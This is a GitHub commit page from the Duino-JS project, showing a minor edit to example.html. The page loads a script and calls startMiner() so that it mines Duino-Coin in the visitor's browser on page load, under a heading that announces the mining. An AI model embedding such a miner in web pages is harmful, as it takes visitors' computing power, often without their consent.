Skip to content

Commit

Permalink
Update example.html
Browse files Browse the repository at this point in the history
  • Loading branch information
sys-256 authored Aug 13, 2021
1 parent 134bfaa commit f75c407
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions example.html
Original file line number Diff line number Diff line change
Expand Up @@ -10,8 +10,8 @@
<h1>Hello, I am mining Duino-Coin on your pc now. I hope you are enjoying it!</h1>
<script src="duino-js.js"></script>
<script>
var username = "Hoiboy19"; //Put your username here (e.g. revox, ericddm, snehaislove or Hoiboy19), the default (in duino-js.js or duino-js.min.js) is Hoiboy19.
var rigid = "Duino-JS"; //If you want to change the rig ID, you can change this. If you want to keep using "Duino-JS", you can remove this line.
username = "Hoiboy19"; //Put your username here (e.g. revox, ericddm, snehaislove or Hoiboy19), the default (in duino-js.js or duino-js.min.js) is Hoiboy19.
rigid = "Duino-JS"; //If you want to change the rig ID, you can change this. If you want to keep using "Duino-JS", you can remove this line.
threads = userThreads; //Set the amount of threads to use here, check out https://github.com/sys-256/Duino-JS for more options.
startMiner(); //starts the miner
</script>
Expand Down

0 comments on commit f75c407

Please sign in to comment.